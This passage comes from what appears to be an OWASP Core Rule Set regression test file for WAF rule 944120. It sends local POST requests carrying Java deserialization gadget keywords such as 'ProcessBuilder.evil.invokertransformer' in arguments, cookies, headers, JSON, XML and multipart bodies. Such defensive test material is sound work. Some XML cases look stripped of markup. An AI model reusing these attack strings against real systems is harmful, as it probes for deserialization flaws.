944120-59 + desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-60 + desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-61 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-62 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-63 + desc: "Content-Type application/json arg value includes keyword 
ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-64 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-65 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatetransformer": "test"} + 
-----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-66 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-67 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-68 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-69 + desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-70 + desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-71 + desc: "Cookie test includes keyword 
ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-72 + desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.invokertransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-73 + desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-74 + desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-75 + desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-76 + desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-77 + desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-78 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-79 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-80 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-81 + desc: "Content-Type application/json 
arg name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-82 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-83 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: 
"HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-84 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-85 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - 
test_title: 944120-86 + desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-87 + desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-88 + desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-89 + desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeclonefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-90 + desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-91 + desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-92 + desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-93 + desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-94 + desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-95 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 
"ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-96 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-97 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-98 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-99 + desc: 
"Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-100 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-101 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-102 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-103 + desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: 
"test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-104 + desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-105 + desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-106 + desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: 